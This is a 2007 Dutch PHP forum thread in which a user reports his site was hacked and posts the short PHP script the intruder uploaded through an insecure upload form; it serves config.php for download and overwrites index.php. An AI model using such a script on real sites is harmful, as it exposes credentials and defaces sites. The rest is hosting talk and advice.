site gehackt.

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Frontend Developer Vue Nuxt HBO Javascript

Samengevat: Deze werkgever levert elke dag betere digitale gebruikerservaringen. Ben jij geschikt als frontend Developer? Heb je ervaring met Vue en Nuxt? Vaste baan: Front-End Developer HBO €3.100 - €4.600 Zij bieden opdrachtgevers een complete dienstverlening op gebied van ontwerpen en ontwikkelen van websites, zoekmachine optimalisatie, online adverteren, content marketing en conversie verbetering. Zij werken met een eigen ontwikkeld CMS. Bij bij hun werk je aan onze eigen bedrijfsapplicaties. Je ontwikkelt met ons de meest nieuwe software. Wij blinken uit als het gaat om de inzet van technologie. Deze werkgever staat open voor elke nieuwe trend. Onze systemen zijn groot

Bekijk vacature »

Senior .NET developer

Functie Als Senior .NET ontwikkelaar ga jij aan de slag in ons Research & development team. Ons team bestaat uit 17 collega’s! Wij zijn momenteel druk bezig met het opzetten van een geheel nieuwe architectuur voor een nieuw product. Hierbij maken wij o.a. gebruik van VS2022 en .NET 6.0. Jouw functie is dan ook voornamelijk backend georiënteerd bij ons. Aangezien wij meetapparatuur ontwikkelen voor de chemische industrie is het ook erg belangrijk om kwalitatief hoogwaardige software te ontwikkelen voor de besturing hiervan. Verder ben jij verantwoordelijk voor het designen, implementeren en testen van nieuwe features. Ook zorg jij voor toekomstbestendige

Bekijk vacature »

C#.NET Developer

Dit ga je doen Ontwikkelen van de Back-end in .NET6 / C# en WebAPI (Focus);) Ontwikkelen van de Front-End in Nodje.js en Angular (secundair); Opstellen van een technisch ontwerp; Testen, documenteren en implementeren van de nieuwe applicatie; Verzorgen van de nazorg, na de implementatie; Het oplossen van bugs en incidenten. Hier ga je werken Als C#.NET Developer binnen deze organisatie kan jij het verschil maken. Zij werken momenteel nog met programmatuur die is ontwikkeld in C++. Hiervan gaan zij afscheid nemen zodra alle nieuwe software in C#.NET geschreven is. Een grootschalig en langdurig project. Voor hen is deze software van

Bekijk vacature »

Oracle APEX developer

Wat je gaat doen: Als Oracle APEX ontwikkelaar bij DPA werk je samen met collega’s aan de meest interessante opdrachten. Je zult je ervaring met SQL, PL/SQL, JavaScript, HTML en CSS inzetten om wensen van opdrachtgevers te vertalen naar technische oplossingen. Je werk is heel afwisselend, omdat DPA zich niet beperkt tot een specifieke branche. Zo ben je de ene keer bezig binnen de zorgsector, de andere keer is dit bij de overheid. Wat we vragen: Klinkt goed? Voor deze functie breng je het volgende mee: Je hebt een hbo- of universitaire opleiding afgerond Je hebt 2 tot 5 jaar

Bekijk vacature »

Cloud Engineer

Ben jij een ervaren Cloud Engineer die complexe omgevingen kan overzien en wil je graag in vaste dienst werken bij een professioneel en kleinschalig bedrijf waar je een belangrijke rol kan spelen? Wij, IntelliMagic in Leiden, ontwikkelen specialistische IT monitoring software die we als SaaS oplossing verkopen aan grote bedrijven in Europa en de VS. We zijn een Nederlands bedrijf met een goede sfeer en met grote waardering voor de persoonlijke inbreng en kwaliteiten van onze medewerkers. Wij zoeken een ervaren Cloud Engineer met academisch denkniveau die verantwoordelijk wordt voor het beheer van de cloud infrastructuur voor onze Europese klanten.

Bekijk vacature »

Junior PHP ontwikkelaar

Functie Wij hebben onlangs onze eerste collega’s aangenomen, waardoor ons development team momenteel uit 4 personen bestaat. We bouwen onze software op basis van een PHP-framework (wat op zichzelf een Symfony framework is). Qua ontwikkeling focussen wij ons op 3 focus velden; – API-ontwikkeling/ Component Creatie – Implementatie – Framework ontwikkeling; het toevoegen van nieuwe functionaliteit of interne microservices Onze senior software engineer focust zich momenteel op de laatste twee punten, maar wij komen handen te kort op het eerste veld. Daarom zijn wij op zoek naar een enthousiaste junior software engineer die graag de kneepjes van het vak wil

Bekijk vacature »

(Lead) PHP Software Developer

Functie omschrijving Voor een klein softwarebedrijf in Breda, zijn wij op zoek naar een PHP software developer met een aantal jaar werkervaring. Je krijgt een plek in een klein team met 2 andere software developers. Wil jij graag werken met de nieuwste technieken bij een bedrijf waar jij de lead gaat nemen in de verder ontwikkeling en modernisering van een eigen software pakket? Dan ben je hier aan het juiste adres! Jouw werkzaamheden gaan er als volgt uit zien: Je gaat aan de slag met de ontwikkeling en vernieuwing van het "in-house" ontwikkelde multimedia platform. Je neemt de lead in

Bekijk vacature »

Technisch Applicatie ontwikkelaar

Functie omschrijving Ben jij op zoek naar een nieuwe uitdaging en zoek jij een informele werkgever waar je zelfstandig kunt werken binnen een leuk IT team, lees dan snel verder want wie weet zijn wij op zoek naar jou! In deze functie werk jij voornamelijk aan: Het onderhouden en ontwikkelen van de IT systemen; Het opzetten van Azure Cloud systemen, denk aan interfaces, hardware op de Cloud, webportalen of BI functies; Werk je aan scripts binnen verschillende software applicaties, denk aan ERP en CAD; Ontwikkel en implementeren je MS PowerApps en Power BI. Bedrijfsprofiel Je komt terecht bij een familiair

Bekijk vacature »

SQL ontwikkelaar

Functieomschrijving Voor een gave werkgever in regio Breda zijn wij per direct op zoek naar een SQL ontwikkelaar/ functioneel consultant. Hier wordt jij mede verantwoordelijk voor zowel de design en implementatie van SQL-databases als voor het verstaan van de processen van klanten naar het vertalen van deze processen naar IT-oplossingen. Jouw takenpakket komt als volgt uit te zien: Je test de ontwikkelde oplossingen om er zeker van te zijn dat deze voldoen aan de functionele specificaties en de behoeften van de organisatie; Je ontwerpt, ontwikkelt en implementeert SQL-databases om de data behoeften van de organisatie te ondersteunen; Je stelt op

Bekijk vacature »

C#.NET Developer

Functieomschrijving Voor een software ontwikkelaar in de omgeving van Vught zijn we op zoek naar een gemotiveerde C# ontwikkelaar. Deel jij hun passie voor development en dan vooral in C#.NET? Dan kan dit wel eens jouw droombaan zijn! Jouw werkzaamheden zullen er ongeveer als volgt uit gaan zien Door de wensen van de klant goed te begrijpen ga jij aan de slag dit om te zetten naar passende oplossingen en werk je deze uit tot een sterk eindproduct. Je gaat je bezighouden met de ontwikkeling van webapplicaties en websites, dit doe je door middel van ASP.NET, MVC Frameworks en C#.

Bekijk vacature »

Front End Ontwikkelaar (React)

In het kort Als front end developer ga je aan de slag met maatwerkprojecten voor onze klanten. Denk bijvoorbeeld aan het toevoegen van een machine aan een database of het corrigeren van formulieren voor ingestuurde orders. Voorbeeld van zo’n project is Smart Link. De projecten waar je op ingezet kunt worden liggen binnen het technische domein waar jij als front end developer een grote rol speelt om samen met je back end collega’s de juiste oplossingen te leveren. please note that this particular role requires fluent Dutch language skills. Dit vind je leuk om te doen Het omzetten van designs

Bekijk vacature »

Database Developer

Functieomschrijving Heb jij ongeveer 3 jaar ervaring als Database Developer met MS SQL of een vergelijkbare database? Wil jij werken voor een ambitieuze werkgever in regio Tilburg waar jij volledig de mogelijkheid krijgt jezelf te ontwikkelen? Lees dan snel verder! Hoe ziet jouw takenpakket eruit? Je gaat projecten gedurende het hele proces begeleiden. Je sluit aan bij afspraken met klanten om hun processen helder te krijgen. Vervolgens voer jij het project uit en zorgt dat dit zo goed mogelijk verloopt; Je werkt aan nieuwe softwareoplossingen die de logistieke processen verbeteren of vernieuwen; Je houdt je bezig met het ontwikkelen van

Bekijk vacature »

Frontend Developer - Leeuwarden

Frontend Developer – Leeuwarden Als Frontend Developer bouw jij mee aan het onderwijs van de toekomst! In een scrum team werken met jonge en enthousiaste collega’s, moderne technieken, ruimte voor eigen ontwikkeling en op een proactieve wijze kunnen meewerken aan innovatie binnen het onderwijs. Magister is het state-of-the-art softwarepakket dat scholen in het voortgezet onderwijs op alle fronten ontzorgt. Van leerlingenadministratie tot het ondersteunen van individuele leerlijnen, van toegang tot digitaal lesmateriaal tot het plannen van het lesrooster. In de Magister app bedient Magister ruim 2,5 miljoen gebruikers waarvan, dagelijks meer dan 600.000 unieke. Hiermee is Magister de absolute marktleider

Bekijk vacature »

High level C++ QT Developer

Vacature details Vakgebied: Software/IT Opleiding: Senior Werklocatie: Eindhoven Vacature ID: 13486 Introductie Would you like to be involved in every aspect of software development for our exceptional products, from specification and design to testing and integration? If you're passionate about software development and eager to apply your programming skills to create customer-focused deliverables, then this is the perfect chance for you to expand your expertise. You can become a member of our Machine Control department's data-driven development team, where you'll design and build software solutions that optimize machine productivity. As a senior software design engineer, you'll participate in all phases

Bekijk vacature »

Back End Developer .NET

Dit ga je doen Ontwikkelen in C# .NET en werken aan nieuwbouw, uitbouw en onderhoud van de software (die communiceren met 68.000 sensoren, waardoor er meerdere miljoenen berichten per uur verwerkt worden); Samenwerken in Scrum Teams; Meewerken aan verschillende, uitdagende projecten; Werken met nieuwe technologieën en vrijheid krijgen om jezelf te ontwikkelen en door te groeien. Hier ga je werken Je komt als Developer te werken bij een organisatie die gespecialiseerd is in software die real-time wordt gebruikt. De software constateert waar werk moet worden uitgevoerd en de chauffeurs worden met een andere applicatie hierop geattendeerd. Ook wordt er direct

Bekijk vacature »

Pagina: 1 2 volgende »

Eric

eric

15/06/2007 18:34:00
Quote Anchor link
Hallo mijn site is ongeveer 1,5 uur geleden gehackt. Ik wilde naar mijn site gaan en opeens stond er dit: (http://eric.byethost8.com). wat moet ik nu doen??

Edit:

Topic gaat niet specifiek over php, daardoor verplaatst naar de koffiehoek.

moderator: Danny Roelofs
Gewijzigd op 01/01/1970 01:00:00 door Eric
 
PHP hulp

PHP hulp

14/05/2024 10:40:22
 
Ponzi

Ponzi

15/06/2007 18:52:00
Quote Anchor link
Eens bellen naar de host? Of het lijkt een gratis accountje. Heeft hij niet gewoon je index.php (.html) vervangen?
 
Jurgen assaasas

Jurgen assaasas

15/06/2007 19:04:00
Quote Anchor link
Zie je wel vaker bij zulk soort hosts. Ik raad je aan een betaalde host te nemen.
 
Aaa Trump

aaa Trump

15/06/2007 19:26:00
Quote Anchor link
whhahahahahahaha Hafohumor!!! xD.

Jah tegen woordig heb je voor 100 euro per jaar al een leuke hosting!
 
Kwastie

Kwastie

15/06/2007 19:28:00
Quote Anchor link
wat dacht je van 25 euro, 3 gb hd, 60 gb traffic. domeinnaam(nee geen reclame, gewoon aanbeveling) www.antagonist.nl, zeer weinig downtime :D mischien alternatief..?
 
Luke Banning

Luke Banning

15/06/2007 20:19:00
Quote Anchor link
robin schreef op 15.06.2007 19:26:
whhahahahahahaha Hafohumor!!! xD.

Jah tegen woordig heb je voor 100 euro per jaar al een leuke hosting!

Ermmmm.... en jij trekt natuurlijk zo 100 euro uit je achterzak?
Je hebt al dingen vanaf 5 euro man, waar een simpele site meer dan voldoende aan heeft
 
Aaa Trump

aaa Trump

15/06/2007 21:06:00
Quote Anchor link
Ik praat over per jaar. :D
 
K i p

K i p

15/06/2007 21:08:00
Quote Anchor link
Luke ook
 
PHP Newbie

PHP Newbie

15/06/2007 21:08:00
Quote Anchor link
robin schreef op 15.06.2007 21:06:
Ik praat over per jaar. :D


Ik betaal nog géén 28 euro per jaar..

8 GB trafic
150 MB webruimte
Uitstekende support
...
 
Menno

menno

15/06/2007 21:11:00
Quote Anchor link
Nou dat is best wel slecht :S
Je kan voor dat geld veel beter krijgen :S
 
Marco PHPJunky

Marco PHPJunky

15/06/2007 21:14:00
Quote Anchor link
ja dat lijkt me wel ja zet anders een eigen server op :P:P
 
Frank -

Frank -

15/06/2007 21:21:00
Quote Anchor link
menno schreef op 15.06.2007 21:11:
Nou dat is best wel slecht :S
Je kan voor dat geld veel beter krijgen :S
Kun je er dan ook even bij vertellen wat jouw definities van goed en slecht zijn?

En bedenk ook, je weet pas of je een goede hostingprovider hebt, als alles goed fout is gegaan. Wanneer hij de boel dan in no-time weer online heeft, dan heb je een goede provider. De meeste knakenboeren geven echter niet thuis wanneer de boel in het 100 loopt...
 
Marco PHPJunky

Marco PHPJunky

15/06/2007 21:24:00
Quote Anchor link
als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
 
Frank -

Frank -

15/06/2007 21:29:00
Quote Anchor link
Marco schreef op 15.06.2007 21:24:
als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
Doen en kunnen, zijn 2 totaal verschillende zaken! Zolang een server draait, heb je geen enkele kennis nodig om de boel online te houden. Stort de boel echter in, dan wordt het een ander verhaal... Bij menig provider ontbreekt de benodigde kennis en kunde om een server goed te beheren. Daarnaast ontbreken noodprocedures of worden deze nooit getest.

Voor een paar euro in de maand kun je niet verwachten dat je een provider met royale service en kunde inhuurt. Bestaat gewoon niet, de kosten liggen namelijk veel hoger. Voor een hobby-site maakt dat echter niet uit, dan is 1 euro per maand een mooi goedkope hobby!

Veel plezier
 
PHP Newbie

PHP Newbie

15/06/2007 23:14:00
Quote Anchor link
PHP Newbie schreef op 15.06.2007 21:08:
robin schreef op 15.06.2007 21:06:
Ik praat over per jaar. :D


Ik betaal nog géén 28 euro per jaar..

- 8 GB trafic
- 150 MB webruimte
- Uitstekende support (Echt uitstekende, problemen over het algemeen dezelfde dag opgelost)
...

- Noodstroomvoorziening
- Je wordt overal van op de hoogte gehouden
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld.
- Support medewerkers met kennis van zaken
- weinig downtime
- Fallback (mail)servers

Voor al dit vind ik zelf dat ik zeker niet teveel betaal...
 
Eric

eric

15/06/2007 23:36:00
Quote Anchor link
ik heb antwoord gekregen van mijn provider. ze hebben mij een log gegeven waar een naam en ip in staat.

Namen zijn, Jurgen en Leon.
Jurgen heeft het volgende script geschreven:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
<?header('Content-Type: application/octet-stream');

readfile("../../config.php");

$file = 'index.html';
$newfile = '../../index.php';

if (!copy($file, $newfile)) {
echo "failed to copy $file...\n";
}?>


hierop reageerde mijn provider op: Hi there ,

It appears they used some upload script you had installed , to upload there php script (into /upload/images) , then from there they ultimately had control of your webspace (as they could upload php scripts to it.. )

Log file attached .

Regards
YourSupportGroup.com
A member of the Byethost Internet Group

(ik zet het log er niet op vanwege de privacy)
-----------------------------

Jurgen zei later tegen mij dat hij in mijn config. php keek om ervan te leren dat het beter beveiligd moet worden. Echter heeft hij het config.php inhoud door gestuurd naar Leon. Leon heeft vervolgens ALLE mappen en scripts veranderd, waardoor ik nu echt alles kwijt ben. Leon beweert dat hij nog een backup van de scripts heeft gemaakt, maar die wil hij niet teruggeven.

Als ik het goed begrijp is Leon toch strafbaar bezig en Jurgen toch ook? Nog erger, deze mensen ken ik, ze waren mijn vrienden./
 
- SanThe -

- SanThe -

15/06/2007 23:39:00
Quote Anchor link
PHP Newbie schreef op 15.06.2007 23:14:
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
- Je wordt overal van op de hoogte gehouden Ook logisch lijkt mij.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
- weinig downtime Ook logisch.
- Fallback (mail)servers Geven vaak meer problemen dan voordelen.
 
PHP Newbie

PHP Newbie

15/06/2007 23:45:00
Quote Anchor link
SanThe schreef op 15.06.2007 23:39:
PHP Newbie schreef op 15.06.2007 23:14:
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
- Je wordt overal van op de hoogte gehouden Ook logisch lijkt mij.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
- weinig downtime Ook logisch.
- Fallback (mail)servers Geven vaak meer problemen dan voordelen.


SanThe, dit valt bij een hoop hosters toch nog altijd vies tegen. En die fallback mailservers werken uitstekend :-)
 
Frank -

Frank -

15/06/2007 23:46:00
Quote Anchor link
Tja, lullig dat het is gebeurd, maar het is ook wel een klein beetje je eigen schuld. Je fiets niet op slot zetten en dan klagen dat die is verdwenen, is net zo iets...

Hopelijk heb je hier iets van geleerd: Het grote boze internet vereist goede beveiliging!

En verder: Je zou eens bij de politie aangifte kunnen doen. Het is alleen afhankelijk van de locale kennis en kunde of ze er ook iets mee gaan doen. Leon vraagt overigens wel om een kleine persoonlijke verbouwing... Maar dat heb ik natuurlijk niet gezegd, dan ben jij namelijk net zo strafbaar!

Ps. Ga lekker verder klooien met PHP, maar zet geen belangrijke data op jouw server wanneer je niet zeker weet of je de beveiliging goed op orde hebt. En van je fouten leer je, vergeet dat vooral niet.
 
Eric

eric

15/06/2007 23:49:00
Quote Anchor link
is het dan verbeterd dat ik mijn config.php voortaan bijvoorbeeld verander in configlalajekomtertochnietachter.php ??:P
 
Jurgen

Jurgen

16/06/2007 00:02:00
Quote Anchor link
Ik heb Eric belooft hem te gaan helpen met het beveiligen van alles, ik wil even kwijt dat ik Eric alleen maar even wou laten zien hoe simpel het is om zijn uploadscript te misbruiken. Helaas is het uit de hand gelopen en dat vind ik jammer. Ik ken Eric al 2 jaar en ik heb echt nooit iets lulligs willen doen tegen em. Wat Leon betreft is hij echt bij mij over de lijn gegaan. Leon is van het type 'ik weet niet wanneer ik moet ophouden' en straks ben ik de sjaak omdat hij nu erics bestanden heeft die hij niet wil teruggeven.

Jurgen
 

Pagina: 1 2 volgende »



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.